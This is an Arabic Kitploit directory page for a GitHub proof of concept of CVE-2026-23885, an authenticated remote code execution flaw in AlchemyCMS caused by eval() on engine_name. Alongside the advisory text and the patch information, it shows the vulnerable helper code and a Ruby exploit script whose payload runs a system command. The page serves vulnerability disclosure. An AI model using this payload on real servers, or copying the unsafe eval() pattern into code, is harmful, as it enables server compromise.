Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/thedeepopc/cve-2026-23885
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubthedeepopc/cve-2026-23885

CVE-2026-23885

إثبات مفهوم لاستغلال CVE-2026-23885، وهو تنفيذ تعليمات برمجية عن بُعد (RCE) مُصادق عليه في AlchemyCMS عبر حقن eval()، مع تحليل تقني وإرشادات للمعالجة.

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استشارة أمنية: CVE-2026-23885

تنفيذ التعليمات البرمجية عن بُعد (RCE) بعد المصادقة في AlchemyCMS

1. الملخص التنفيذي

تم اكتشاف ثغرة أمنية حرجة تتعلق بـ عدم تحييد التوجيهات في التعليمات البرمجية المُقيَّمة ديناميكيًا (CWE-95) في إطار عمل AlchemyCMS. تسمح هذه الثغرة لمستخدم مُصادق يتمتع بصلاحيات إدارية بتنفيذ تعليمات Ruby البرمجية وأوامر النظام على الخادم المضيف عبر نقطة حقن eval().


2. التحليل الفني للثغرة

المكوّن المُعرَّض للخطر

  • الملف: app/helpers/alchemy/resources_helper.rb
  • الدالة: Alchemy::ResourcesHelper#resource_url_proxy
  • مستوى الخطورة: متوسط/مرتفع (RCE بعد المصادقة)

السبب الجذري

تعالج الدالة المساعدة سمة engine_name القادمة من كائن resource_handler بطريقة غير آمنة. يتم تمرير هذه السمة مباشرة إلى دالة eval() في Ruby دون أي تعقيم أو تحقق مسبق.

root@kitploit:~
def resource_url_proxy(resource_handler)
  if resource_handler.in_engine?
    eval(resource_handler.engine_name) # rubocop:disable Security/Eval
  else
    main_app
  end
end
إن وجود التوجيه `# rubocop:disable Security/Eval` يؤكد أن الآثار الأمنية لاستخدام `eval()` كانت معروفة ولكن تم تجاوزها أثناء التنفيذ.

3. إثبات المفهوم (PoC)
ناقل الهجوم
يتم تفعيل الثغرة داخل الواجهة الإدارية لـ AlchemyCMS عند عرض طرق العرض القائمة على الموارد (مثل المواقع أو اللغات). إذا تمكن المهاجم من التلاعب بإعدادات الوحدة أو بيانات الموارد الأساسية، فيمكنه تحقيق التنفيذ.

نص برمجي مستقل للاستغلال
يوضح النص البرمجي التالي تنفيذ التعليمات البرمجية التعسفية من خلال محاكاة بيئة الدالة المساعدة المُعرَّضة للخطر:

Ruby

require 'ostruct'

def resource_url_proxy(resource_handler)
  if resource_handler.engine_name && !resource_handler.engine_name.empty?
    eval(resource_handler.engine_name)
  end
end

# الحمولة: تنفيذ أمر النظام 'id' وإنشاء ملف إثبات
payload = "system('id > /tmp/rce_verified'); 'main_app'"
handler = OpenStruct.new(engine_name: payload)

resource_url_proxy(handler)
دليل التنفيذ
عند التنفيذ، تتم معالجة أمر النظام، مما يمنح المهاجم إمكانية الوصول إلى بيئة الخادم.
RCE Terminal Proof
  1. التأثير والخطورة السرية: مرتفعة. وصول كامل إلى بيانات التطبيق وأسرار البيئة.

السلامة: مرتفعة. القدرة على تعديل الملفات وسجلات قاعدة البيانات.

التوفر: مرتفع. احتمالية تعطيل النظام بالكامل.

معرف CVE: CVE-2026-23885

  1. المعالجة تمت معالجة الثغرة في الإصدارات المُصححة التالية:

7.4.12

8.0.3

يتضمن الإصلاح استبدال استدعاء eval() بدالة public_send() لتوجيه الطلبات بشكل آمن إلى وكيل المحرك المقصود:

Ruby

main_app.public_send(resource_handler.engine_name) if resource_handler.engine_name.present?

اكتشاف الثغرة: تدقيق أمني مستقل

مرجع CVE: CVE-2026-23885

  • قائمة CVE: CVE-2026-23885 على CVE.org
  • تحليل الثغرة: قاعدة بيانات Tenable CVE-2026-23885
  • سياسة أمان AlchemyCMS: إرشادات الأمان
تنزيل الأداة